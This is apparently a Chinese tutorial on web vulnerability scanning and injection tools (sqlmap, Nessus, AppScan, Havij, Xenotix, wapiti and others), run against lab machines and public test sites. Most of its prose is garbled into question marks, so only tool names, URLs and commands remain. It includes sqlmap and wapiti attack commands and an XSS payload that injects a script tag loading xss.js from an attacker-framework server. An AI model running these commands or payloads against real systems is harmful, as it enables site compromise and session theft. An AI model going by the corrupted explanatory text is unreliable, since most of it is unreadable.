??????7??sqlmap??python??????£?
????????sql?????
??????????????????????????????????跽???????????????????????????????????????????????????
?????????sqlmap???
????sqlmap?????????????????????burpsuitePOSTsqlmap????????????Burpsuitesqlmap???http://www.freebuf.com/tools/6426.html??
????????
????1.????burpsuite??????????(?????????wvs????????http://testasp.vulnweb.com/Login.asp)??post????????????????????????籣???burpsuite_sql_post.txt
????2.sqlmap.py-r"burpsuite_sql_post.txt"-ptfUName(????tfUPass)
?????????????
????2.wvs??192.168.184.135??
????WVS(WebVulnerabilityScanner)????????????Web??ó??????????????????????κο????Web??????????????
?????????windows????wireshark?????????????????
?????磺tshark-D(???????)
????tshark-i??????-bfilesize:10240(10M)-w"xxxxx.pcap"??10M????????棬????????????????????????漸??????????ο????????
????????????????????4??500??
????3.nessus4.x(5.x?汾??????)??192.168.184.135??
????Nessus???????????????????
?????????????xxxx??xxxxx
???????????????????????棬????????ο?????????????Ч??????
????https://www.owasp.org/images/4/4f/Web_Application_Vul_Testing_with_Nessus_2012.02.01.pdf
?????????3????
???????????????????????????????????????????????????????Ч???????
????4.WebCruiserEnt??????????????log192.168.184.130??
????Web?????蹤??WebCruiser-WebVulnerabilityScanner
????Web??????????????????????????????????裬????????????????SQL???????????XPath???????????????????????????????????????SQL??????XPath?????????????????
????5.appscan?????????webgoat??????????????????????????????????????????????payload???????????
?????????????????????????????192.168.184.135??
????http://public.dhe.ibm.com/software/dw/cn/demos/rIntroToAppScan/rIntroToAppScan.pdf
????http://www.nxadmin.com/tools/675.html
????http://www.360doc.com/content/11/0831/10/284310_144677089.shtml
????6.safe3wvs?????????????????????webgoat?м????????192.168.184.135??
?????????????????????????????????????????????cookie??????????????temperdata?????cookie??????????
??????????????
????SQL???XSS????
????7.XenotixXSSExploitFrameworkV4?????????????д?????????????????????????
????owasp?????????????WEB??ó????е?XSS??????????????????????????????????????xss?????web?????
????????????????÷???????????????IP??????4.5?汾???????127.0.0.1:5050
????????????????????????????????y????????е?????????±????н????youtube?????????
????1.??????????????victim???????????????url???????裬?????????й?????????裬?????????????????????????XSS????????
??????????????????ò??????????????????????js?????
????2.????и???????????????????????????????XSS???????????????????????????????
????????XSS???http://192.168.184.135/aa.php?id=1
??????????id????????XSS??в??????????????????
????http://192.168.184.135/aa.php?id=1<script>127.0.0.1:5050/xss.js</script>
????????????????????????Щ??????е????????????????victim?????????????JS???????????????
????8.Havij??????????????log192.168.184.130??
????Havij????????????SQL?????
????(??????????????????????蹤??????羭??????safe3wvs???????????????????????????????ù???????????????????е?????????
?????????????????????????)
?????????dvwa??????????????????????????
????9.wapiti??python??????£???????????????log192.168.184.130??
????sql?????
????????3.x?汾???exe????????py?????????????python???
???????????????????web??蹤???????????????????????SQL??LDAP??CRLF??????????????????????????????????С?wapiti????python????????????????????????????pythonvm???????
????1.??????dvwa??????Ч???????
??????1?????е??????????л??cookie?????????????????cookie?????????json???????????????汾?????£?
????C:xxxsoftwarewapiti-2.3.0-win32-standalonewapiti-2.3.0-win32-standalone>wapiti-getcookie.execookie.jsonhttp://192.168.184.141/dvwa/
??????2??????cookie???裬-s?????????????????????????????????????????±???
????C:ddsoftwarewapiti-2.3.0-win32-standalonewapiti-2.3.0-win32-standalone>wapiti.exe"http://192.168.184.141/dvwa/"-ccookie.json-s"http://192.168.184.141/dvwa/vulnerabilities/"
??????3??????????????????????????????Щ??????http://lzy.iteye.com/blog/338178?????nikto?????????????????????????????????
????????????????????Щ???????????????????ν?????????????py???????
??????4??????????url?????????????????url???????????????????????????????????????????
????C:ddsoftwarewapiti-2.3.0-win32-standalonewapiti-2.3.0-win32-standalone>wapiti.exe"http://192.168.184.141/dvwa/"-ccookie.json-s"http://192.168.184.141/dvwa/vulnerabilities/sqli/?id="
????????Ч??????????????????????????????login.php??SQL???
???????testfireЧ????Щ??????
C:xxxxsoftwarewapiti-2.3.0-win32-standalonewapiti-2.3.0-win32-standalone>wapiti-getcookie.execookie.jsonhttp://demo.testfire.net/bank/login.aspx
C:xxxsoftwarewapiti-2.3.0-win32-standalonewapiti-2.3.0-win32-standalone>wapiti.exehttp://demo.testfire.net/-ccookie.json-xhttp://demo.testfire.net/bank/logout.aspx
????10.pangolin?????
???????????????